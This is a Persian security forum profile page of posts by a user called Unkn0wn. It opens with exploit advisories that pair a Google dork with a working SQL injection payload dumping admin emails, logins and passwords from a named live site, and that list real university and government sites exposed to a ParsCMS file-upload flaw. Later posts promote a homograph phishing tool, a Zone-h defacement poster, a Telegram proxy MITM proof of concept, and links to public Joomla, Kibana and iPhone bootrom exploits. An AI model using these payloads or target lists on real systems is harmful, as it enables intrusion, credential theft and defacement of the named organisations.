رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Unkn0wn

Active Members
  • تعداد ارسال ها

    115
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    1

تمامی مطالب نوشته شده توسط Unkn0wn

  1. --------------------------------------------------------- # Exploit Title: MD-WEBMARKETING - SQL Injection vulnerability # Google Dork: intext:"Desenvolvido por: MD-WEBMARKETING" inurl:.php?id= # Date: 2020-01-09 # Exploit Author: Unkn0wn # Vendor Homepage: http://mdwebmarketing.com.br/ # Software Link: - # Version: - # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- Demo: http://www.camaradeodapolis.ms.gov.br/exibe.php?id=117[sql injection] http://amesccg.com.br/beneficios.php?tipo=2[sql injection] http://amesccg.com.br/beneficios.php?tipo=-2+/*!50000Union*/+SeleCt+1,2,3,/*!50000Group_ConCat(email,0x3a,login,0x3a,senha)*/,5,6,7+From+administracao--+ ---------------------------------------------------------- # contact : [email protected] # Visit: https://t.me/l314XK205E # <UndergroundLife/> 2010 - 2020 https://cxsecurity.com/issue/WLB-2020010097
  2. Unkn0wn

    Parscms - Arbitrary File Upload

    ParsCMS - Arbitrary File Upload 2020.01.06 de Unkn0wn (DE) de Risk: High Local: No Remote: Yes CVE: N/A CWE: N/A Dork: "modules/eform/upload/" --------------------------------------------------------- # Exploit Title: ParsCMS - Arbitrary File Upload # Google Dork: N/A # Date: 2020-01-01 # Exploit Author: Unkn0wn ([email protected]) # Vendor Homepage: http://parscms.com/ # Software Link: private cms # Version: 1.0 # Tested on: Ubuntu # CVE : N/A --------------------------------------------------------- exploit: "modules/eform/upload/" demo: http://iauda.ac.ir/modules/eform/upload/ https://www.msc.ir/modules/eform/upload/ http://farhangi.tums.ac.ir/en/modules/eform/upload/ http://old.isipo.ir/modules/eform/upload/ http://eskordi.com/modules/eform/upload/ http://pdiaari.tums.ac.ir/modules/eform/upload/ http://rvp.iauda.ac.ir/modules/eform/upload/ http://www.rca.gov.ir/modules/eform/upload/ http://farhangi.tums.ac.ir/en/modules/eform/upload/ ---------------------------------------------------------- "Happy new Year 2020" # https://Github.com/0x9a
  3. با سلام. در این پست قصد آموزش دستورات خط فرمان ویندوز رو دارم! هر پست شامل یک یا دو دستور با توضیحات هستش لطفا صبور باشید. مبحث گسترده است.
  4. Unkn0wn

    Icsg Homottacker V2.0 - Final

    به نام خدا بابت فعالیت کم عذر خواهی میکنم کم کم چیزایی بیشتر رو منتشر میکنم. در این پست قصد معرفی به ابزار ساده برای انجام Homography Attack استفاده میشه. این نوع حمله برای انجام phishing استفاده میشه که در نوع خودش روش جدیدی هستش و بسیار ازش استفاده میشه که نمونه آن بر روی سایت های paypal - apple انجام شده است از اینجا میتونید راجعبه این حمله بخونید: Read more نکته:برای دریافت کارکتر مورد نظر وارد فولدر نرم افزار بشید و فایل hom.txt پ.ن:تیم ایران سایبر هیچ مسئولیتی در قبال استفاده از این ابزار به عهده ندارد و فقط صرفا جنبه اموزشی دارد. رو باز کنید ویژگی ها: 1- ساخت دامنه با متد homography 2- جستجوی دامنه ساخته شده برای قابلیت ثبت شدن یا نشدن دریافت سورس نرم افزار: https://github.com/0x9a/HomoTTacker فایل اجرایی و فیلم اضافه شد پسورد فایل: iran-cyber.net homoTTackerv2.0.rar
  5. Unkn0wn

    Buffer Overflow And Exploit Developing Training

    دوستان اگر کسی ویدیو مربوط به اموزش XoDiAK رو دارن اپلود کنن ممنون میشم
  6. با سلام تو این پست راجعبه یه آسیب پذیری تو جاوا اسکریپت صحبت کردیم که روی Kibana انجام شده بود حالا اکسپلویت اون پابلیک شده از اینجا میتونید ببینید: https://github.com/LandGrey/CVE-2019-7609
  7. با سلام امروز یک اکسپلویت برای سیستم مدیریت محتوا محبوب جوملا پابلیک شده که سطح این اسیب پذیری بسیار خطرناک هستش بنده چندین سایت حتی سایت ایرانی رو چک کردم و متاسفانه اکثر سایت های ایرانی که تست شده بهش آسیب پذیر هستن این اسیب پذیری به نفوذ گر به راحتی دسترسی از راه دور رو میده و بر روی ورژن های 3.0.0 تا 3.4.6 جواب میده! اکسپلویت رو برای برسی میتونید از گیت هاب زیر مشاهده کنید لینک گیت هاب: Github سو استفاده از اکسپلویت بر عهده خود شماست
  8. Unkn0wn

    دسترسی در شل

    با سلام شما میتونید از باگ جدید لینوکس برای دور زدن سطح دسترسی استفاده کنید شاید جواب بده بهتون چون جدید ترین باگ موجود هستش! و اینکه مشخصه شما دارید از خود شل برای symlink استفاده میکنید و بهتره دستی اقدام کنید مطمعنن جواب میگیرید یه سرچ کوچیک تو سطح نت راجعبه سیملینک بهتون کمک میکنه سوالی هم داشتید اساتید انجمن میتونن بهتون کمک کنن
  9. Unkn0wn

    دسترسی در شل

    شاید پرمیشن یکی از دامن ها ازاد باشه ولی معمولا نیاز به بالاترین سطح دسترسی یعنی روت دارید
  10. به نام خدا حمله‌ی Prototype Pollution در جاواسکریپت هر Objectی در جاواسکریپت یک مشخصه (property) نهان به اسم __proto__ داره. وقتی به مستنداتش: https://developer.mozilla.org/en-US/docs/Web/JavaScript/Reference/Global_Objects/Object/proto مراجعه می‌کنیم اکیدا توصیه شده که دیگه بیخیال این feature در جاواسکریپت شیم و تا الان هم به دلایل سازگاری نیگرش داشتند. کار این مشخصه اینه که در یک کلام دسترسی داشته باشه! (نقش set کننده و get کننده‌ی مشخصه‌ها رو داره!) حتی این مشخصه‌هه به شکلیه که شما می‌تونید یک آبجکت دیگه رو به کل درون یک آبجکت تعریف/تنظیم کنید (اسلاید شماره ۱۰). حالا درون این به‌هم‌ریختگی یه قابلیت دیگه هم وجود داره که شما می‌تونید توی prototype تون مشخصه تعریف کنید! ببینید: obj1.prototype.iscg = true[/b][/center] [b] [center]let obj1 = {} obj1.iscg //true حالا به جایiscg بذارید isAdmin یا هر مشخصه‌ی دیگه‌ای که می‌تونید بهش مقدار دلخواه بدین و در context های مختلف ازش استفاده کنید. به این عمل می‌گن prototype pollution. به همین راحتی. حالا توی این حمله که به Kibana انجام شده یه محقق خلاق اومده یه آبجکت از یه صفحه‌ی دیگه رو که تابع eval رو اجرا می‌کرده دستکاری و آبجکت خودش رو درش تزریق کرده که باعث RCE شده. متن کامل مقاله: https://slides.com/securitymb/prototype-pollution-in-kibana
  11. Unkn0wn

    دوره آموزشی زبان برنامه نویسی C#

    به نام خدا آموزش محیط ویژوال استدیو در این ویدیو که به طور اختصاصی ایران سایبر برای شما دوستان اماده کردم تا حدودی با چیز هایی که نیاز دارید در محیط ویژوال استدیو اموزش داده شده. امیدوارم لذت ببرید Toolbox Nuget Create Project Change Color . . لینک دانلود: Visual Studio Environment پسورد فایل: iran-cyber.net
  12. Unkn0wn

    اموزش کار با Nmap

    با سلام شما زمانی که سرویس دهندتون سرور هاشو جابجا میکنه وظیفه داره ای پی سرور های جدید رو به شما اعلام کنه و شما به راحتی میتونید ای پی سرور رو جایگزین کنید
  13. Unkn0wn

    سلام مشکل در اجرای Vmware

    وقت بخیر. دوست قبلا گفتم خواهش میکنم تو انجمن فینگلیش پست ندین و اینکه شما فعال هم کنید این گزینه رو باز به دردسر که بدترین اون ها کندی سیستم و هنگ کردن سیستم هستش که ممکنه به cpu هم اسیب برسونه .چرا لقمه رو دور سرتون دور بدین بهتر اول کال همون vritualbox نصب کنید خیلی بهتره برا شما
  14. Unkn0wn

    سلام مشکل در اجرای Vmware

    با سلام. لطفا در پست های بعدی از فینگلیش استفاده نکنید. و این که این مشکل به نوع cpu مربوط هستش! بهتر virtualbox رو دانلود کنید چون میگین سیستمتون هم قدیمی هستش virtualbox گزینه بهتری هست تا vmware
  15. به نام خدا با سلام، Bootroom یا SecureROM روی دستگاه‌های شرکت اپل، اولین کد مهمیه که روی هر کدومشون اجرا می‌شه. Bootroom فقط خواندنیه و پیدا شدن آسیب‌پذیری روش انقدر مهم و بحرانیه که اپل هیچوقت نمی‌تونه اونو پچ کنه. تنها راهش جایگزین شدن سخت‌افزاره! اکسپلویتی که امروز منتشر شد از Bootroom آیفون 4S تا آیفون 8 رو در بر می‌گیره! آسیب‌پذیری این Bootroomها از نوع Race Condition هست و اکسپلویتی که منتشر شده بخاطر جنبه‌ی حیاتی‌ای که داره، ترجیح داده شده که Full Jailbreak نباشه. ولی این امکان برای محقق وجود داره که SecureRom رو دامپ کنه، رمزنگاری فایل سیستم اپل (keybag)‌ رو رمزگشایی کنه و در نهایت امکان بهره‌گیری از JTAG رو روی دستگاه به قصد دسترسی مستقیم به حافظه دستگاه (DMA)‌ فراهم کنه. این بنده‌ی خدایی که این آسیب‌پذیری رو کشف کرده میگه موقعی که اپل نسخه‌ی بتا iOS ۱۲ رو ریلیز کرده، یه آسیب‌پذیری UAF روی کد iBoot USB رو پچ کرده که از راه دور قابل اکسپلویت نبوده و نیاز به دسترسی فیزیکی به دستگاه داشته. اینطوری بوده که با تحلیل اون، این آسیب‌پذیری کشف شده. آخرین اکسپلویتی که از Bootroom تاحالا کشف شده مربوط به iPhone 4 به قبل بوده! حالا با این اکسپلویت متاسفانه همه به راحتی می‌تونن هر دستگاه آیفونی رو Jailbreak کنن. هکرها، پلیس‌ها، دزدها، دولت‌ها و... هم می‌تونن با این اکسپلویت گوشی شما رو Jailbreak و تمام اطلاعاتتون رو در اختیار داشته باشند. می‌تونید از این لینک به این اکسپلویت دسترسی داشته باشید. Github: (https://github.com/axi0mX/ipwndfu) منبع:آفسک
  16. Unkn0wn

    دوره آموزشی زبان برنامه نویسی C#

    به نام خدا بنده تصمیم گرفتم پست شروع شده توسط دوست عزیز root3r رو ادامه بدم. امیدوارم بتونم کمی به عزیزان کمک کنم هرچند همه عزیزان اساتید بنده هستند. آشنایی مقدماتی با زبان c# در این پست به اشنای با C# میپردازیم,ببینیم سی شارپ اصلا چیست و از کجا اومده. سی شارپ (به انگلیسی: C#) یک زبان برنامه‌نویسی کامپایلری، سطح بالا، شیءگرا، ساخت یافته، رویداد محور، تابعی، دستوری و جنریک است که توسط شرکت مایکروسافت در سال ۲۰۰۰ میلادی از خانوادهٔ زبان‌های چارچوب دات‌نت معرفی شد. زبان سی شارپ همچنین از خانواده زبان‌های برنامه‌نویسی سی نیز است. زبان سی شارپ، یک زبان برنامه‌نویسی چند الگویی و منظم شده مدل‌های تابعی، اَمری، عمومی، شیءگرا و جز گرا و در بستر چارچوب دات نت می‌باشد. این زبان توسط شرکت مایکروسافت و جزئی از دات نت به وجود آمد و بعداً استانداردهای ECMA و ISO را نیز دربر گرفت. سی شارپ یکی از ۴۴ زبان برنامه‌نویسی است که توسط زمان اجرای زبان مشترک از چارچوب دات‌نت پشتیبانی می‌شوند و در همه جا به وسیله مایکروسافت ویژوال استودیو شناخته می‌شود. زبان سی شارپ با قدرت و در عین حال سطح بالایی خود توانسته توجه بسیاری از برنامه نویسان را به خود جلب کند. این زبان برپایه سادگی، مدرن بودن، همه منظوره و شئ گرا بودن ساخته شد. آندرس هجلزبرگ، طراح زبان برنامه‌نویسی دلفی، سرپرستی تیم طراحان زبان سی شارپ را بر عهده داشت. این زبان دارای دستوری شیءگرا مشابه ++C است و به شدت از زبان‌های جاوا و دلفینیازمندمدرک تأثیر پذیرفته‌است. در ابتدا نام این زبان COOL بود که مخفف C like Object Oriented Language بود، هر چند در ژوئیه ۲۰۰۰م، زمانی که مایکروسافت پروژه را عمومی اعلام کرد، اسم آن به سی شارپ تغییر پیدا کرد اهداف طراحی زبان: استاندارد ECMA این اهداف طراحی زبان را برای سی شارپ برآورده می‌سازد سی شارپ یک زبان برنامه‌سازی ساده، مدرن، برای اهداف عمومی و شیءگرا است. به دلیل اهمیت داشتن موضوع نیرومندی و دوام و بهره‌وری برنامه‌نویس، زبان دارای چک‌کننده Strong Type، چک‌کننده مرزهای آرایه، تشخیص حالت‌هایی که یک متغیر مقداردهی اولیه نشده‌است، قابلیت انتقال کدها و Garbage Collection خودکار است. این زبان برای استفاده در اجزای توسعه نرم‌افزار برای دستیابی به مزایای سامانه‌های توزیعی در نظر گرفته شده‌است. قابلیت انتقال برنامه‌نویس بسیار مهم است، خصوصاً برای آن دسته از برنامه‌نویسانی که با زبان‌های C و C++ آشنا هستند. پشتیبانی از این زبان برای بین‌المللی شدن بسیار مهم است. زبان سی شارپ برای نوشتن برنامه‌ها برای سامانه‌های تعبیه شده و میزبان در نظر گرفته شده‌است، سیستم‌عامل‌های پیچیده بسیار بزرگ گرفته تا توابع اختصاصی بسیار کوچک. هر چند برنامه‌های نوشته شده با سی شارپ طوری هستند که از لحاظ حافظه و پردازنده مورد نیاز مقرون به صرفه باشند، ولی خود زبان از لحاظ اندازه و کارایی به خوبی زبان‌های C و اسمبلی نیست. سی شارپ یک زبان همه منظوره نیز تلقی می شود زیرا با یادگیری این زبان می توانید به شاخه های مختلف برنامه نویسی از جمله بک اند سایت و یا برنامه نویسی اندروید زامارین نیز می توانید با استفاده از این زبان انجام دهید با استفاده از سی شارپ می توان بازی ساخت و از موتور قدرتمند یونیتی بهره مند شد پـــــــــــــــــــــــــــــــــــایان
  17. اگر هوستینگ دارید و یا از خدمات هوست اشتراکی استفاده می‌کنید، احتمال خیلی زیاد در معرض خطرید. نرم‌افزار Exim که در سیستم‌های عامل شبه‌یونیکسی نقش ارسال و دریافت ایمیل رو بر عهده داره، چند روز پیش یه وصله آسیب‌پذیری منتشر کرد که معلوم شد قابلیت اجرای دستورات مخرب از راه دور رو به مهاجم میده. یعنی اگه Exim Server تون کانکشن‌های TLS رو قبول می‌کنه، پس حتما آسیب‌پذیره. این فقط مربوط به کتابخونه‌ی TLS نیست، بلکه هر دوی GnuTLS و OpenSSL آسیب‌پذیرن. این باگ در واقع از طریق ارسال یک SNI که با یه سری backslash-null (بعنوان یه escape کننده) ختم می‌شه در هنگام TLS handshake اولیه قابل اکسپلویت شدنه. جزئیات بیشتر و گسترده‌تر فنی‌‌ش رو می‌تونید اینجا بخونید: https://github.com/Exim/exim/commit/2600301ba6dbac5c9d640c87007a07ee6dcea1f4 بدلیل اینکه این نرم‌افزار بصورت قابل توجهی در نرم‌افزارهای مدیریت هوستینگ‌ها و هوست‌ها (cPanel و WHM) کاربرد داره، پیشنهاد موکد ما به مدیران هوستینگ‌ها اینه که نسبت به به‌روزرسانی همه‌ی این نرم‌افزارها اقدامات لازم سریعا صورت بگیره. در حال حاضر توزیع و نرخ استفاده از Exim در ایران رو می‌تونید در تصویر مشاهده کنید. به میزبان‌هایی همچون سرور پارس، گرین وب، فراسو، نت‌میهن و.. هشدار می‌دهیم که هرچه سریعتر نسبت به به‌روزرسانی زیرساخت‌های خود در برابر این آسیب‌پذیری اقدام نمایند. زیرساخت‌های Exim آسیب‌پذیر در ایران منبع:آفسک
  18. Unkn0wn

    Iran Cyber Homottacker V1.0

    ممنون بابت نظرتون انشالله ورژن 2 که کامل تر هستش همراه با فیلم قرار میدم خدمت شما عزیزان
  19. Unkn0wn

    Iran Cyber Homottacker V1.0

    به نام خدا بابت فعالیت کم عذر خواهی میکنم کم کم چیزایی بیشتر رو منتشر میکنم. در این پست قصد معرفی به ابزار ساده برای انجام Homography Attack استفاده میشه. این نوع حمله برای انجام phishing استفاده میشه که در نوع خودش روش جدیدی هستش و بسیار ازش استفاده میشه که نمونه آن بر روی سایت های paypal - apple انجام شده است از اینجا میتونید راجعبه این حمله بخونید: Read more [/url] نکته:برای دریافت کارکتر مورد نظر وارد فولدر نرم افزار بشید و فایل hom.txt پ.ن:تیم ایران سایبر هیچ مسئولیتی در قبال استفاده از این ابزار به عهده ندارد و فقط صرفا جنبه اموزشی دارد. رو باز کنید " در ورژن دوم جستجوی دامنه اضافه میشه " دریافت سورس نرم افزار: https://github.com/0x9a/HomoTTacker1
  20. Unkn0wn

    استخراج 5 ارز همزمان بدون نیاز به Cpu

    عزیز اینجا جای تبلیغ این مورد نیست اگرم لینک میزارید لینک زیرمجموعه گیری خودتون نزارید
  21. Unkn0wn

    Telegram Mtp - Mitm Vulnerability.poc

    github قسمت پایانی متن قرار داده شده پاک نشده
  22. به نام خدا سلام خدمت همه عزیزان و اساتید گرامی. بابت فعالیت کم عذر خواهی میکنم یکم سرم شلوغه انشالله کم کم چیزایی جدیدی که نوشتم یا پیدا کردم رو برای عموم به اسم تیم به اشتراک میزارم خوب بنده با یه بررسی ساده تونستم با یک ترفند حمله مرد میانی رو روی پروکسی های تلگرام اجرا بکنم , زیاد حرف نمیزنم توضیحات در گیت کاملا داده شده با این روش میتونیم به راحتی به آی پی کسایی که به پروکسی متصل هستند دسترسی پیدا کنیم. و خیلی اطلاعات دیگه! عکس از نمونه فضای اجرا شده: توضیحات کامل راجعبه نحوه بهره برداری از این ترفند رو در github میتونید ببینید: https://github.com/0x9a/MTProxy-MITM-PoC
  23. Unkn0wn

    Iran Cyber Zone-h Poster > C#

    به نام خدا سلام خدمت همه عزیزان در این پست قصد انتشار یه نرم افزار خیلی ساده * ZoneH-Poster * ولی کاربردی رو دارم نمونه این نرم افزار زیاد هست ولی اکثرا تحت لینوکس و وب هستند و خیلی کم دیدم برای ویندوز نوشته باشن حالا با توجه به نیاز بنده این نرم افزار رو آماده کردم توضیح خاصی نداره فقط دیفیسر های عزیز زمانی که بخوان تعداد بالایی سایت رو با سرعت در سایت zone-h ثبت کنند این نرم افزار میتونه به کمکشون بیاد توضیح خاصی نداره لینک دانلود از github: https://github.com/0x9a/Tools/tree/master/ZoneH-Poster لینک اسکن: https://virusscan.jotti.org/en-US/filescanjob/x1kic7zryw پسورد فایل: iran-cyber.net امیدوارم مفید باشه ZoneH-Poster.zip
  24. سلام وقت بخیر این نظر شخصی بنده است و شاید درست نباشه! اگر من بودم ترجیح میدادم یه دسترسی با سطح دسترسی ادمین در ویندوز و یا رووت در لینوکس ایجاد کنم. که تو این زمینه اموزش های زیادیی میتونید پیدا کنید
  25. سلام بنده این اکسپلویت روی اکسس های اسیب پذیر خودم تست زدم و جواب گرفتم. لازم بدونید زمان میبره اجرای اکسپولیت چون باید از ریورس شل venom استفاده میکنه زمان بر هستش. امکان داره این آسیب پذیری تو سرور شما رفع شده باشه.

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...